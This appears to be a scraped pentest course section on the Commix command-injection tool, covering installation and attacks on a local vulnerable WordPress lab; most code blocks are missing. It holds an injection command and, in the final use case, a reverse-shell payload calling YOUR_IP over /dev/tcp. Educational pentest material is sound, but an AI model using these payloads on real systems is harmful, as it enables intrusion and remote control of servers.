Mastering Commix$: A Comprehensive Pentest Course

Commix$ for Ethical Hacking: A Complete Guide

# Commix$ for Ethical Hacking: A Complete Guide ## Section 5: Mastering Commix$ Welcome to the final section of our course on Commix$, the powerful tool for exploiting web applications by leveraging command injection vulnerabilities. In this section, we will dive deep into the installation and configuration of Commix$ on Kali Linux, followed by step-by-step usage with real-world use cases. Each step will be accompanied by detailed technical explanations and practical code examples, particularly focusing on WordPress scenarios. ### 5.1 Installation and Configuration on Kali Linux **Prerequisites:** Before we proceed with the installation, ensure that your Kali Linux system is up to date. Open your terminal and run the following commands: **Installing Commix$:** Commix$ is available in the Kali Linux repositories, allowing for easy installation. However, if you wish to install the latest version from the GitHub repository, follow these steps: 1. **Clone the Commix$ Repository:** 2. **Navigate to the Commix Directory:** 3. **Install Required Dependencies:** Commix$ requires several Python libraries. Install them using: 4. **Make Commix$ Executable:** 5. **Run Commix$:** You can now execute Commix$ using: ### 5.2 Step-by-Step Usage Commix$ can be used for various types of command injection attacks. Here, we'll cover how to use it effectively on a sample vulnerable WordPress installation. **Setting Up a Vulnerable WordPress Instance:** If you do not have a vulnerable instance to test, you can use tools like DVWA or OWASP's Juice Shop. For simplicity, we will use the following vulnerable WordPress site hosted locally. 1. **Install WordPress Locally:** You can use XAMPP or LAMP stack to set up WordPress. Follow the official installation guide if needed. 2. **Add a Vulnerable Plugin:** To simulate command injection, you can look for a vulnerable plugin such as the "Exec PHP" plugin, which allows executing arbitrary PHP code. ### 5.3 Performing a Command Injection Attack Once your WordPress instance is set up and the vulnerable plugin is installed, let's begin our attack. #### Basic Command Injection with Commix$ 1. **Identify the Injection Point:** Assume that the "Exec PHP" plugin allows executing commands through a specific endpoint, e.g., `http://localhost/wordpress/wp-admin/admin.php?page=exec-php`. 2. **Use Commix$ to Inject Commands:** **Explanation:** – `–url` specifies the target URL. – `–data` includes the payload you want to execute. In this case, `whoami` returns the current user. 3. **Interpreting the Output:** Commix$ will process the command and display the output in the terminal. If successful, you might see: [/dm_code_snippet] www-data [/dm_code_snippet] This indicates that the command was executed with the web server's user permissions. ### 5.4 Advanced Usage and Features Commix$ offers various features that can enhance your pentesting capabilities: #### 5.4.1 Using Proxies If you need to route traffic through a proxy for anonymity, you can use the `–proxy` flag. Here's how: #### 5.4.2 Specifying User-Agent Sometimes it is necessary to modify the User-Agent to bypass security mechanisms. Use the `–user-agent` flag: ### 5.5 Real-World Use Cases #### Use Case 1: Gaining Shell Access Using Commix$ not only allows executing commands but also gaining reverse shell access, which is crucial in many penetration tests. 1. **Reverse Shell Command via Commix$:** python3 commix.py –url "http://localhost/wordpress/wp-admin/admin.php?page=exec-php" –data "code=system('bash -c "bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1""')""